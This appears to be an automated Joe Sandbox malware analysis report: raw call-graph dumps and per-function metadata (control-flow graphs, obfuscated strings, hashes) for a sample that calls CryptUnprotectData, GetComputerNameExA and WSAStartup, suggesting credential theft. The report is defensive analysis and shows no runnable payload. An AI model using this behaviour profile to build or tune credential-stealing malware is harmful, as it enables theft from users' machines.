8233->8264 8235 98cce6 8236 9a42d0 4 API calls 8235->8236 8237 98cd6e 8236->8237 8238 9a4560 3 API calls 8237->8238 8239 98cd8a 8238->8239 8240 9a7440 2 API calls 8239->8240 8241 98cdac 8240->8241 8243 9a4360 8242->8243 8243->8243 8244 9a4376 RtlExpandEnvironmentStrings 8243->8244 8247 9a43d0 8244->8247 8245 9a4450 8245->8231 8246 9c06f0 2 API calls 8246->8247 8247->8245 8247->8246 8248 9a46e1 8247->8248 8250 9a4431 RtlExpandEnvironmentStrings 8247->8250 8272 9c0460 8248->8272 8250->8245 8250->8247 8250->8248 8252 9c0340 LdrInitializeThunk 8252->8245 8254 9a456e 8253->8254 8255 9c0340 LdrInitializeThunk 8254->8255 8257 9a4408 8255->8257 8256 9c06f0 2 API calls 8256->8257 8257->8256 8258 9a46e1 8257->8258 8261 9a4431 RtlExpandEnvironmentStrings 8257->8261 8263 9a4450 8257->8263 8259 9c0460 2 API calls 8258->8259 8260 9a4712 8259->8260 8262 9c0340 LdrInitializeThunk 8260->8262 8260->8263 8261->8257 8261->8258 8261->8263 8262->8263 8263->8233 8263->8263 8265 9a7460 8264->8265 8268 9a74ae 8265->8268 8282 9be110 LdrInitializeThunk 8265->8282 8266 9a7726 8266->8235 8268->8266 8271 9a756e 8268->8271 8283 9be110 LdrInitializeThunk 8268->8283 8269 9bc570 RtlFreeHeap 8269->8266 8271->8269 8274 9c0480 8272->8274 8273 9a4712 8273->8245 8273->8252 8276 9c04ce 8274->8276 8280 9be110 LdrInitializeThunk 8274->8280 8276->8273 8279 9c05af 8276->8279 8281 9be110 LdrInitializeThunk 8276->8281 8277 9bc570 RtlFreeHeap 8277->8273 8279->8277 8279->8279 8280->8276 8281->8279 8282->8268 8283->8271 8098 9ad7bd 8099 9ad7ca GetComputerNameExA 8098->8099 8284 9a18f0 8285 9a18fe 8284->8285 8287 9a1950 8284->8287 8288 9a1a10 8285->8288 8289 9a1a20 8288->8289 8289->8289 8290 9c14b0 LdrInitializeThunk 8289->8290 8291 9a1b0f 8290->8291 8292 98de73 8294 98ded0 8292->8294 8293 98df1e 8294->8293 8296 9be110 LdrInitializeThunk 8294->8296 8296->8293 8101 989eb7 8102 9bfe00 8101->8102 8103 989ec7 WSAStartup 8102->8103 8297 98ec77 8298 98ec8e CoInitializeSecurity 8297->8298 8104 9b0b2b CoSetProxyBlanket 8300 9ac9eb 8303 9ac8e2 8300->8303 8301 9acab5 8303->8301 8304 9be110 LdrInitializeThunk 8303->8304 8304->8303 8305 98a369 8306 98a430 8305->8306 8309 98b100 8306->8309 8308 98a479 8311 98b190 8309->8311 8310 98b1b5 8310->8308 8311->8310 8313 9be0a0 8311->8313 8314 9be0e8 8313->8314 8315 9be0f3 8313->8315 8316 9be0c0 8313->8316 8317 9be0d4 8313->8317 8314->8311 8318 9bc570 RtlFreeHeap 8315->8318 8316->8315 8316->8317 8319 9be0d9 RtlReAllocateHeap 8317->8319 8318->8314 8319->8314 8105 9bea29 8106 9bea50 8105->8106 8107 9bea8e 8106->8107 8112 9be110 LdrInitializeThunk 8106->8112 8111 9be110 LdrInitializeThunk 8107->8111 8110 9beb59 8111->8110 8112->8107 8320 9ad7ee 8321 9ad7f5 8320->8321 8321->8321 8322 9ad896 FreeLibrary 8321->8322 8324 9adbc9 8322->8324 8323 9adc30 GetComputerNameExA 8324->8323 8324->8324 8113 9bc5a0 8114 9bc5d0 8113->8114 8117 9bc62e 8114->8117 8121 9be110 LdrInitializeThunk 8114->8121 8115 9bc801 8117->8115 8120 9bc749 8117->8120 8122 9be110 LdrInitializeThunk 8117->8122 8118 9bc570 RtlFreeHeap 8118->8115 8120->8118 8121->8117 8122->8120 8123 9b8ea0 8124 9b8ec5 8123->8124 8127 9b8fc9 8124->8127 8132 9be110 LdrInitializeThunk 8124->8132 8126 9b9210 8127->8126 8129 9b90e1 8127->8129 8131 9be110 LdrInitializeThunk 8127->8131 8129->8126 8133 9be110 LdrInitializeThunk 8129->8133 8131->8127 8132->8124 8133->8129 8134 9ba2a0 8136 9ba2d0 8134->8136 8138 9ba428 8136->8138 8141 9c0340 8136->8141 8145 9c06f0 8136->8145 8153 9c0d20 8136->8153 8161 9be110 LdrInitializeThunk 8136->8161 8142 9c0360 8141->8142 8142->8142 8143 9c042f 8142->8143 8162 9be110 LdrInitializeThunk 8142->8162 8143->8136 8146 9c0710 8145->8146 8149 9c075e 8146->8149 8163 9be110 LdrInitializeThunk 8146->8163 8147 9c09d3 8147->8136 8149->8147 8152 9c084e 8149->8152 8164 9be110 LdrInitializeThunk 8149->8164 8150 9bc570 RtlFreeHeap 8150->8147 8152->8150 8152->8152 8154 9c0d2f 8153->8154 8157 9c0e98 8154->8157 8165 9be110 LdrInitializeThunk 8154->8165 8155 9c114b 8155->8136 8157->8155 8160 9c108e 8157->8160 8166 9be110 LdrInitializeThunk 8157->8166 8158 9bc570 RtlFreeHeap 8158->8155 8160->8158 8161->8136 8162->8143 8163->8149 8164->8152 8165->8157 8166->8160 8330 9be967 8331 9be980 8330->8331 8331->8331 8334 9be110 LdrInitializeThunk 8331->8334 8333 9be9ef 8334->8333 8167 991227 8168 991241 8167->8168 8169 9914e5 RtlExpandEnvironmentStrings 8168->8169 8172 98f444 8168->8172 8171 991562 8169->8171 8171->8172 8173 9957c0 8171->8173 8174 9957e0 8173->8174 8174->8174 8175 9c1320 LdrInitializeThunk 8174->8175 8176 9958ed 8175->8176 8179 995ae8 8176->8179 8182 995b92 8176->8182 8188 99594e 8176->8188 8195 995cad 8176->8195 8203 9c1720 8176->8203 8179->8188 8210 9be110 LdrInitializeThunk 8179->8210 8181 9c1720 LdrInitializeThunk 8181->8195 8182->8182 8183 9c1320 LdrInitializeThunk 8182->8183 8183->8195 8186 996f0e 8187 9960b5 CryptUnprotectData 8189 9960df 8187->8189 8187->8195 8188->8172 8189->8172 8191 9966be 8189->8191 8196 99634d 8189->8196 8197 996792 8191->8197 8211 9be110 LdrInitializeThunk 8191->8211 8192 99731b 8194 9968eb 8194->8186 8213 9be110 LdrInitializeThunk 8194->8213 8195->8181 8195->8187 8195->8188 8195->8189 8209 9be110 LdrInitializeThunk 8195->8209 8196->8188 8199 9c14b0 8196->8199 8197->8194 8212 9be110 LdrInitializeThunk 8197->8212 8200 9c14d0 8199->8200 8201 9c15fe 8200->8201 8214 9be110 LdrInitializeThunk 8200->8214 8201->8196 8205 9c1750 8203->8205 8204 99593f 8204->8179 8204->8182 8204->8188 8204->8195 8207 9c17a9 8205->8207 8215 9be110 LdrInitializeThunk 8205->8215 8207->8204 8216 9be110 LdrInitializeThunk 8207->8216 8209->8195 8210->8191 8211->8197 8212->8194 8213->8192 8214->8201 8215->8207 8216->8204

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 009957C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                                        • API String ID: 0-510280711
                                                                                                                                                                                                                                                        • Opcode ID: 30132ff1d31d7ea5f28be7cf11023b23cf1b1799fc8b8197cdd3525216842bfc
                                                                                                                                                                                                                                                        • Instruction ID: c1227e2c1ff6cea09dde3ef577fc4fbf866102869f26cdf3dcfe1a4f957159a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30132ff1d31d7ea5f28be7cf11023b23cf1b1799fc8b8197cdd3525216842bfc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C216B2A083408FDB249F28D8917ABB7E5FFD5314F19892CE5D98B396D7349801CB52
                                                                                                                                                                                                                                                        Function 009A1D00 Relevance: 26.8, Strings: 21, Instructions: 506COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 369 9a1d00-9a1d48 call 9c1320 372 9a2449-9a2459 369->372 373 9a1d4e-9a1db8 call 994c70 call 9bc540 369->373 378 9a1dba-9a1dbd 373->378 379 9a1dbf-9a1dd4 378->379 380 9a1dd6-9a1dda 378->380 379->378 381 9a1ddc-9a1de7 380->381 382 9a1de9 381->382 383 9a1dee-9a1e05 381->383 384 9a1ea8-9a1eab 382->384 385 9a1e0c-9a1e17 383->385 386 9a1e07-9a1e95 383->386 390 9a1eaf-9a1eb4 384->390 391 9a1ead 384->391 388 9a1e19-9a1e89 call 9be110 385->388 389 9a1e97-9a1e9c 385->389 386->389 399 9a1e8e-9a1e93 388->399 395 9a1e9e 389->395 396 9a1ea0-9a1ea3 389->396 392 9a1eba-9a1eca 390->392 393 9a2392-9a23c7 call 9bc570 390->393 391->390 397 9a1ecc-9a1ee9 392->397 404 9a23c9-9a23cc 393->404 395->384 396->381 400 9a207b-9a2083 397->400 401 9a1eef-9a1f13 397->401 399->389 405 9a2085-9a2088 400->405 403 9a1f17-9a1f1a 401->403 406 9a1f1c-9a1f31 403->406 407 9a1f33-9a1f4d call 9a2460 403->407 408 9a23ce-9a23e3 404->408 409 9a23e5-9a23eb 404->409 410 9a208a-9a208e 405->410 411 9a2090-9a20a1 call 9bc540 405->411 406->403 407->400 425 9a1f53-9a1f7c 407->425 408->404 413 9a23ed-9a23f3 409->413 414 9a20b5-9a20b7 410->414 422 9a20a3-9a20ac 411->422 423 9a20b1-9a20b3 411->423 420 9a23f7-9a2409 413->420 421 9a23f5 413->421 417 9a2358-9a2363 414->417 418 9a20bd-9a20e0 414->418 426 9a2367-9a236f 417->426 427 9a2365-9a2375 417->427 424 9a20e2-9a20e5 418->424 429 9a240b 420->429 430 9a240d-9a2413 420->430 428 9a2447 421->428 431 9a2379-9a237d 422->431 423->414 432 9a211a-9a2157 424->432 433 9a20e7-9a2118 424->433 434 9a1f7e-9a1f81 425->434 436 9a2377 426->436 427->436 428->372 437 9a243b-9a243e 429->437 430->437 438 9a2415-9a2437 call 9be110 430->438 431->397 439 9a2383-9a2388 431->439 443 9a215b-9a215e 432->443 433->424 444 9a1fae-9a1fc5 call 9a2460 434->444 445 9a1f83-9a1fac 434->445 436->431 441 9a2442-9a2445 437->441 442 9a2440 437->442 438->437 451 9a245a 439->451 452 9a238e-9a2390 439->452 441->413 442->428 448 9a2160-9a2175 443->448 449 9a2177-9a217f 443->449 458 9a1fc7-9a1fcf 444->458 459 9a1fd4-9a1feb 444->459 445->434 448->443 453 9a2181-9a218c 449->453 452->393 456 9a218e 453->456 457 9a2193-9a21aa 453->457 462 9a2259-9a2260 456->462 463 9a21ac-9a2246 457->463 464 9a21b1-9a21be 457->464 458->405 460 9a1fef-9a2079 call 987f50 call 9948c0 call 987f60 459->460 461 9a1fed 459->461 460->405 461->460 468 9a2262 462->468 469 9a2266-9a2289 462->469 465 9a2248-9a224d 463->465 464->465 466 9a21c4-9a223a call 9be110 464->466 473 9a224f 465->473 474 9a2251-9a2254 465->474 476 9a223f-9a2244 466->476 468->469 475 9a228b-9a228e 469->475 473->462 474->453 478 9a22ed-9a2301 475->478 479 9a2290-9a22eb 475->479 476->465 481 9a2333-9a2336 478->481 482 9a2303-9a2307 478->482 479->475 483 9a2338-9a2345 call 9bc570 481->483 484 9a2347-9a2349 481->484 485 9a2309-9a2310 482->485 487 9a234b-9a234e 483->487 484->487 489 9a2312-9a231e 485->489 490 9a2320-9a2323 485->490 487->417 494 9a2350-9a2356 487->494 489->485 491 9a232b-9a2331 490->491 492 9a2325 490->492 491->481 492->491 494->431
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                                        • API String ID: 0-1565257739
                                                                                                                                                                                                                                                        • Opcode ID: 306b921e3dc2760d1dc6f35fd07e23b8ec7df1c68904bb3b3eaea4efedf84b69
                                                                                                                                                                                                                                                        • Instruction ID: ce4348d2be4a1f13e04890048c072d24ba1c9fc0e3e87a1764896580d7babe05
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 306b921e3dc2760d1dc6f35fd07e23b8ec7df1c68904bb3b3eaea4efedf84b69
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90227B7150C7808FD7249B28C48576FBBE1AB86314F284D6DE5EA87392D7B9C845CB83
                                                                                                                                                                                                                                                        Function 009B9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 497 9b9280-9b92a4 498 9b92b0-9b92d7 497->498 498->498 499 9b92d9-9b92ef 498->499 500 9b92f0-9b9322 499->500 500->500 501 9b9324-9b936a 500->501 502 9b9370-9b938c 501->502 502->502 503 9b938e-9b93a7 502->503 505 9b942a-9b9435 503->505 506 9b93ad-9b93b6 503->506 508 9b9440-9b947b 505->508 507 9b93c0-9b93d9 506->507 507->507 509 9b93db-9b93ee 507->509 508->508 510 9b947d-9b94de 508->510 511 9b93f0-9b941e 509->511 514 9b9906-9b9932 call 9bfe00 GetVolumeInformationW 510->514 515 9b94e4-9b9515 510->515 511->511 512 9b9420-9b9425 511->512 512->505 520 9b993c-9b993e 514->520 521 9b9934-9b9938 514->521 517 9b9520-9b954d 515->517 517->517 519 9b954f-9b9576 SysAllocString 517->519 524 9b957c-9b9596 CoSetProxyBlanket 519->524 525 9b98f5-9b9902 519->525 523 9b9950-9b9957 520->523 521->520 526 9b9959-9b9960 523->526 527 9b9970-9b998f 523->527 528 9b98eb-9b98f1 524->528 529 9b959c-9b95b4 524->529 525->514 526->527 530 9b9962-9b996e 526->530 531 9b9990-9b99b2 527->531 528->525 532 9b95c0-9b961e 529->532 530->527 531->531 533 9b99b4-9b99ca 531->533 532->532 535 9b9620-9b969f 532->535 536 9b99d0-9b9a06 533->536 540 9b96a0-9b96ff 535->540 536->536 537 9b9a08-9b9a2e call 99e960 536->537 543 9b9a30-9b9a37 537->543 540->540 542 9b9701-9b972d 540->542 552 9b9733-9b9755 542->552 553 9b98d6-9b98e7 SysFreeString * 2 542->553 543->543 544 9b9a39-9b9a4c 543->544 546 9b9a52-9b9a65 call 987fd0 544->546 547 9b9940-9b994a 544->547 546->547 547->523 548 9b9a6a-9b9a71 547->548 555 9b975b-9b975e 552->555 556 9b98cc-9b98d2 552->556 553->528 555->556 557 9b9764-9b9769 555->557 556->553 557->556 558 9b976f-9b97b7 557->558 560 9b97c0-9b97d4 558->560 560->560 561 9b97d6-9b97e0 560->561 562 9b97e4-9b97e6 561->562 563 9b98bb-9b98c8 562->563 564 9b97ec-9b97f2 562->564 563->556 564->563 565 9b97f8-9b9806 564->565 567 9b9808-9b980d 565->567 568 9b983d 565->568 570 9b981c-9b9820 567->570 569 9b983f-9b9877 call 987f50 call 988e10 568->569 581 9b9879-9b988f 569->581 582 9b98a7-9b98b7 call 987f60 569->582 572 9b9822-9b982b 570->572 573 9b9810 570->573 574 9b982d-9b9830 572->574 575 9b9832-9b9836 572->575 577 9b9811-9b981a 573->577 574->577 575->577 578 9b9838-9b983b 575->578 577->569 577->570 578->577 581->582 583 9b9891-9b989e 581->583 582->563 583->582 585 9b98a0-9b98a3 583->585 585->582
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00001F7A), ref: 009B9550
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009B958E
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32 ref: 009B98DF
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 009B98E5
                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009B992E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                                        • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                                        • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                                        • Opcode ID: 231b19b335ed674537f7ac38260c8e389aff76f0493053b4da8303d8f344d173
                                                                                                                                                                                                                                                        • Instruction ID: a56d9dbb7fbe38aab7d684a086f21e4c78456aceaab7dd8e3b2edcb60c9e825f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 231b19b335ed674537f7ac38260c8e389aff76f0493053b4da8303d8f344d173
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C220476A183519BD310CF24C881B9BBBE6EFC5324F18892CF6949B3A1D775D845CB82
                                                                                                                                                                                                                                                        Function 0098B100 Relevance: 19.2, Strings: 15, Instructions: 425COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 587 98b100-98b18b 588 98b190-98b199 587->588 588->588 589 98b19b-98b1ae 588->589 591 98b40b-98b40f 589->591 592 98b1bc-98b3db 589->592 593 98b4be-98b4c7 589->593 594 98b52f-98b538 589->594 595 98b414-98b4b7 call 987e30 589->595 596 98b4e4-98b4ef 589->596 597 98b1b5-98b1b7 589->597 598 98b4f6-98b4fd 589->598 624 98b6d3-98b6dc 591->624 622 98b3e0-98b3eb 592->622 599 98b4ce-98b4df 593->599 600 98b4ff-98b52a call 9bfe00 593->600 623 98b540-98b56a 594->623 595->593 595->594 595->596 595->598 601 98b69c-98b6b1 595->601 602 98b65e-98b668 595->602 603 98b6fe-98b710 595->603 604 98b79f 595->604 605 98b6f0-98b6f1 595->605 606 98b610-98b61e 595->606 607 98b792-98b79a 595->607 608 98b717-98b732 call 9be0a0 595->608 609 98b5f7-98b60e call 9bfe00 595->609 610 98b748-98b76d 595->610 611 98b789 595->611 612 98b689-98b697 595->612 613 98b76f 595->613 614 98b66f-98b687 call 9bfe00 595->614 615 98b780 595->615 616 98b782 595->616 617 98b5e3-98b5f0 595->617 618 98b623-98b640 595->618 619 98b647-98b657 595->619 596->594 596->598 596->601 596->602 596->603 596->604 596->605 596->606 596->607 596->608 596->609 596->610 596->611 596->612 596->613 596->614 596->615 596->616 596->617 596->618 596->619 621 98b6df-98b6e6 597->621 620 98b572-98b592 598->620 626 98b6c6-98b6d0 599->626 600->626 632 98b6ba-98b6bd 601->632 602->606 602->609 602->612 602->614 603->604 603->606 603->608 603->609 603->610 603->611 603->612 603->613 603->614 603->615 603->616 627 98b7a2-98b7a9 604->627 642 98b6f8 605->642 606->632 607->605 644 98b737-98b741 608->644 609->606 636 98b774-98b77a 610->636 611->607 612->627 613->636 614->612 616->611 617->606 617->609 618->601 618->602 618->603 618->604 618->605 618->606 618->607 618->608 618->609 618->610 618->611 618->612 618->613 618->614 618->615 618->616 618->619 619->601 619->602 619->603 619->604 619->605 619->606 619->607 619->608 619->609 619->610 619->611 619->612 619->613 619->614 619->615 619->616 630 98b5a0-98b5bd 620->630 622->622 635 98b3ed-98b3f8 622->635 623->623 629 98b56c-98b56f 623->629 624->621 626->624 627->632 629->620 630->630 641 98b5bf-98b5dc 630->641 632->626 650 98b3fb-98b404 635->650 636->615 641->601 641->602 641->603 641->604 641->605 641->606 641->607 641->608 641->609 641->610 641->611 641->612 641->613 641->614 641->615 641->616 641->617 641->618 641->619 642->603 644->604 644->606 644->609 644->610 644->611 644->612 644->613 644->614 644->615 644->616 650->591 650->593 650->594 650->595 650->596 650->598 650->601 650->602 650->603 650->604 650->605 650->606 650->607 650->608 650->609 650->610 650->611 650->612 650->613 650->614 650->615 650->616 650->617 650->618 650->619
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                                        • API String ID: 0-620192811
                                                                                                                                                                                                                                                        • Opcode ID: f7d80d2e7ebfaed0b02f3dca50d60926cc23a4cdb14978f1e18fea4bafc2b09a
                                                                                                                                                                                                                                                        • Instruction ID: 336beada53683a0ee043cb41af5add94d5562b4d8d180801f1e297005a23e648
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7d80d2e7ebfaed0b02f3dca50d60926cc23a4cdb14978f1e18fea4bafc2b09a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A40263B1614B05CFD324CF25D891BABBBE1FB49314F058A2CE5AB8BAA0D734A444DF50
                                                                                                                                                                                                                                                        Function 00991227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
